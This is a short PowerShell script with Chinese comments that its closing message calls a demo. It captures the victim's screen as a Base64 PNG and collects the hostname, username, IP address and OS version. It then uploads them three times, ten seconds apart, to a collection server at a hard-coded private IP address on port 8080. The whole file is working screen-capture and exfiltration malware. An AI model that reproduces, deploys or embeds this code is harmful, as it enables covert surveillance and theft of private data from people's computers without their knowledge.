Add-Type -AssemblyName System.Windows.Forms, System.Drawing

$global:destinationIP = "192.168.50.202"
$global:url = "http://$($global:destinationIP):8080/upload"

for ($i = 1; $i -le 3; $i++) {
    Write-Host "`n[*] 開始第 $i 次資料蒐集與傳送..." -ForegroundColor Cyan
    
    # --- 1. 螢幕截圖並轉為 Base64 ---
    $Screen = [System.Windows.Forms.Screen]::PrimaryScreen
    $Bitmap = New-Object System.Drawing.Bitmap($Screen.Bounds.Width, $Screen.Bounds.Height)
    $Graphics = [System.Drawing.Graphics]::FromImage($Bitmap)
    $Graphics.CopyFromScreen($Screen.Bounds.X, $Screen.Bounds.Y, 0, 0, $Bitmap.Size)
    
    $ms = New-Object System.IO.MemoryStream
    $Bitmap.Save($ms, [System.Drawing.Imaging.ImageFormat]::Png)
    $base64Image = [Convert]::ToBase64String($ms.ToArray())
    
    $Graphics.Dispose(); $Bitmap.Dispose(); $ms.Dispose()

    # --- 2. 系統資訊蒐集 ---
    $ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.InterfaceAlias -like "*Wi-Fi*" -or $_.InterfaceAlias -like "*Ethernet*" }).IPAddress[0]
    $sysInfo = "OS: $((Get-WmiObject Win32_OperatingSystem).Caption)"

    # --- 3. 打包並傳送 ---
    $payload = @{
        seq        = $i
        hostname   = $env:COMPUTERNAME
        user       = $env:USERNAME
        ip         = $ip
        info       = $sysInfo
        screenshot = $base64Image
    } | ConvertTo-Json -Compress

    try {
        Invoke-RestMethod -Uri $global:url -Method Post -Body $payload -ContentType "application/json" -TimeoutSec 20
        Write-Host "[+] 第 $i 次傳送成功！" -ForegroundColor Green
    } catch {
        Write-Host "[-] 第 $i 次傳送失敗: $($_.Exception.Message)" -ForegroundColor Red
    }

    # --- 4. 休息 (Sleep) ---
    if ($i -lt 3) {
        Write-Host "[*] 休息 10 秒後進行下一次傳送..." -ForegroundColor Gray
        Start-Sleep -Seconds 10
    }
}

Write-Host "`n[!] 所有任務已完成，Demo 結束。" -ForegroundColor Yellow
